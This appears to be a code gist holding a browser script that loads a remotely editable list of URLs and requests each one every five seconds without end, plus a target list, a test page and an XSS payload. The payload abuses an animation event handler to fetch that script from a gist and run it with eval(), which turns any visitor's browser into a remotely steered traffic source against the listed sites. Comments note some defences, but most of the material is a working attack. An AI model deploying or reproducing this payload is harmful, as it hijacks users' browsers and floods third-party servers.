This script makes the client (browser) issue a large number of resource requests
index.html |
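/**
 * Issue an asynchronous HTTP GET through XMLHttpRequest and expose the result as a Promise.
 *
 * The URL is passed to open() exactly as given; no scheme or host check is done here.
 * In a browser, a cross-origin response is only readable when the target permits it
 * via CORS; a blocked or failed transfer is reported through the onerror path.
 *
 * @param {string} url - Address to request.
 * @returns {Promise<string>} Resolves with the response body when the status is exactly 200.
 *   Rejects with an Error for any other status or for a network-level failure.
 */
function request(url) {
  return new Promise((resolve, reject) => {
    console.log("[+]\tStart request \n[=]\t[%s]", url);
    const xhr = new XMLHttpRequest();
    xhr.open('GET', url);
    // 'html/text' is not a value responseType accepts, so the original assignment was
    // ignored and the default (text) was used; 'text' states that intent explicitly.
    xhr.responseType = 'text';
    xhr.onload = () => {
      if (xhr.status === 200) {
        resolve(xhr.response);
        return;
      }
      // statusText is often empty (e.g. over HTTP/2), so report the numeric status as well.
      reject(new Error(`Didn't load successfully; error code:${xhr.status} ${xhr.statusText}`));
    };
    xhr.onerror = () => {
      reject(new Error('There was a network error.'));
    };
    // Send the request
    xhr.send();
  });
}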
// Fetch the target list (JSON with a top-level "urls" member) and hand it to
// iterateRequest every 5000 ms. The list is read at run time, so whoever can edit
// that remote file decides which hosts receive traffic. The interval handle is
// discarded, so the loop only stops when the page is closed or navigated away.
request('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/urls.json')
  .then((body) => {
    const parsed = JSON.parse(body);
    setInterval(iterateRequest, 5000, parsed.urls);
  })
  .catch((error) => console.error(error));
/**
 * Start one request() per entry of `array` and log the outcome of each.
 *
 * The requests are started without waiting for earlier ones to settle, and the
 * response bodies are discarded: only "OK <url>" or "KO <url>" is written to the console.
 *
 * @param {string[]} array - URLs to request.
 * @returns {void}
 */
function iterateRequest(array) {
  const probe = (target) => {
    request(target)
      .then(() => console.log("OK %s", target))
      .catch(() => console.error("KO %s", target));
  };
  array.forEach((entry) => probe(entry));
}
{ | |
"urls": [ | |
"https://paukyblinders.fr/", | |
"https://lostsh.github.io/", | |
"https://v2.jokeapi.dev/joke/Any?safe-mode", | |
"https://randomuser.me/api/", | |
"https://api.chucknorris.io/jokes/random", | |
"https://catfact.ninja/fact", | |
"https://api.jokes.one/jod" | |
] | |
} |
Using request function
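/*
 * How to use the request() function shown earlier to fetch a resource:
 * the promise resolves with the response body, or rejects with an Error.
 * (The original comment ended in "* /", which never closes the comment.)
 */
request('https://example.com/')
  .then((response) => console.log(response))
  .catch((error) => console.error(error));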
Index file for testing index.html
<!DOCTYPE html>
<!-- Local test page: loads requestor.js from the same directory as this file.
     A script element that has a src attribute does not execute its inline text,
     so the commented-out line inside it is inert either way. -->
<script src="requestor.js">
//function pwn(){fetch('http://localhost:8000/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();
</script>
Full Payload
<!-- Injected-markup sample. The empty @keyframes rule lets the animation finish at once,
     so onanimationend runs without user interaction; the handler fetches requestor.js
     and passes the response text to eval(). It depends on three things a page can deny:
     markup being parsed as elements (context-aware output encoding or an HTML sanitizer),
     inline event handlers and eval() being allowed (a Content-Security-Policy whose
     script-src omits 'unsafe-inline' and 'unsafe-eval'), and fetch() to an arbitrary
     origin (CSP connect-src). -->
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="function pwn(){fetch('https://gist.githubusercontent.com/lostsh/447ba676ef5cf70f9905f79fb6c4934c/raw/requestor.js').then(function (resp) {return resp.text();}).then(function (data) {eval(data);});}; pwn();"></xss>
Payload